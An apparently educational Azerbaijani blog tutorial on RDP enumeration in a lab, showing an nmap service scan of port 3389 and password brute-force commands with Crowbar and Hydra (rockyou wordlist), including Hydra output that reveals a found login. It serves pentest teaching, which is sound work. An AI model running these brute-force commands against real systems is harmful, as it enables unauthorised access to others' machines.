Salam hər vaxtınız xeyir dəyərli oxucular, bu gün İrəli səviyyə Enumeration başlığı altında RDP protokollarının ətraflı bir Enumeration yerinə yetirəcəyik.Əvvəlcə nəzəri sonra isə Metasploitable maşının köməyi ilə əməliyyatları praktiki olaraq görəcəyik.
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Uzaqdan Qrafiki İdarəetmə Protokolları
İndiki zamanımızda Windowsda olduğu kimi istifadəçi inerfeysinə qoşulmaq üçün protokollarla Linux cihazınada daxil ola bilərik.Bu başlıqda hostların servislərin necə təyin etməli olduğumuzu və onu necə profesional şəkildə necə pentest edə biləcəyik görəcəksiniz.Bu məqsəd üçün daha kompleks alətlərdən istifadə olunur.
- Uzaqdan Masaüstə İdarəetmə protokolu (RDP,Remote Desktop Protocol)- TCP protokolu üzərində 3389 portundan istfiadə edir.
- Virtual Network Computing (VNC) – TCP protokolu üzərində 5900 portundan istifadə olunur.
RDP (Port 3389)
Uzaqdan Masaüstə İdarəetmə protokolu – Windows əməliyyat sisteminə uzaqdan qoşulmaq üçün istifadə olunan protokoldur.Əgər Windows cihazda bu üsull ilə qoşulma aktivləşdirilibsə onda istifadəçilər bundan istifadə edərək cihaza daxil ola bilərlər.Diqqət edilməli məqam isə RDP serverinin 3389 portundan istifadə etdiyini bilməyik.
RDP serveri aktivləşdirilən hədəfin sadə skanını yerinə yetirək.
┌──(root㉿kali)-[~]
└─# nmap -T4 -sV -sC -p3389 192.168.0.107
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 17:38 +04
Nmap scan report for 192.168.0.107
Host is up (0.00055s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DESKTOP-K7ISHBI
| Not valid before: 2025-02-04T07:04:34
|_Not valid after: 2025-08-06T07:04:34
| rdp-ntlm-info:
| Target_Name: DESKTOP-K7ISHBI
| NetBIOS_Domain_Name: DESKTOP-K7ISHBI
| NetBIOS_Computer_Name: DESKTOP-K7ISHBI
| DNS_Domain_Name: DESKTOP-K7ISHBI
| DNS_Computer_Name: DESKTOP-K7ISHBI
| Product_Version: 10.0.19041
|_ System_Time: 2025-03-30T13:38:41+00:00
|_ssl-date: 2025-03-30T13:38:41+00:00; +1s from scanner time.
RDP istifadəçilərinin Brute Force hücumu
RDP protokolu yavaş işlədiyi üçün Hydra aləti ilə bruteforce hücumu yerinə yetirə bilmir.RDP protokolunun istifadəçi məlumatlarını brute force hücumu yerinə yetirmək üçün Hydra`ya nisbətən Crowbar alətindən istifadə edə bilərik.Crowbar köməyi ilə əvvəl tapdığımız servisin brute force hücumu yerinə yetirək. (Əvvəlcə apt install crowbar kommandası ilə aləti yükləyək)
crowbar -b rdp -s 192.168.0.107/24 -u rose -C pass.txt
QEYD:Bu üsuldan istifadə edərək Brute force hücumunu yerinə yetirmək istədim yalnız bu tool işləmədi xəta verdi.Xətaları aradan qaldırdıqdan sonrada təkrarladım, yenə alınmadı.
Tək yolumuz yenədə Hydra alətindən istifadə etməkdir.Aşağıda həmin kommandanı görə bilərik.
┌──(root㉿kali)-[~]
└─# hydra -t 4 -l rose -P /usr/share/wordlists/rockyou.txt rdp://192.168.0.107
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-30 20:51:09
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344400 login tries (l:1/p:14344400), ~3586100 tries per task
[DATA] attacking rdp://192.168.0.107:3389/
[ERROR] freerdp: The connection failed to establish.
[3389][rdp] host: 192.168.0.107 login: rose password: password
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-30 20:51:13
Gördüyünüz kimi crowbar alətində baş verən xəta ilə əlaqədar əməliyyatı Hydra üzərində yerinə yetirdik və uğurlu nəticə aldıq.
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat